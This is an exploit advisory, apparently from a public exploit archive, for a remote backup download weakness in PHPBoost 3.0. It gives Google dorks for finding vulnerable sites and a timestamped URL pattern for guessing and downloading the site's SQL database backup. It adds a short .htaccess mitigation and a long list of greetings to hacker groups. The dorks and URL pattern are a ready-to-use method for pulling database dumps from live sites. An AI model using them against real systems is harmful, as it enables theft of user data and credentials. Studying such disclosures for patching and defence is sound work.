PHPBoost version 3.0 suffers from a remote backup download vulnerability.
ef1574e2e3c50a6b9c92f75f53d0b32ddd0539433aaa7cc5f36a70142127fb52
###
# Title : PHPBoost 3.0 Remote Download Backup Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Download Backup Database (*.sql) File
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : Dr.Ride
##
# Go0gle Dorks :
# 1> "Powered by PHPBoost 3.0"
# 2> "Boosté par PHPBoost 3.0"
####
# Demo:
https://[localhost]/[path]/cache/backup/backup_phpboost_11-03-29-17-35-34.sql
# Exploit :
https://[localhost]/[path]/cache/backup/backup_[sitname]_*Y*M*D*H*Mn*S*.sql
%{
Y = year
M = month
D = day
Mn = minute
S = second
}%
# Download The Backup .SQL File ** The Access Not Forbidden **
# The Clouting : Creating .htaccess File and Writ in him : ' deny from all ' * Save as ../../backup/
=================================================================================================
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================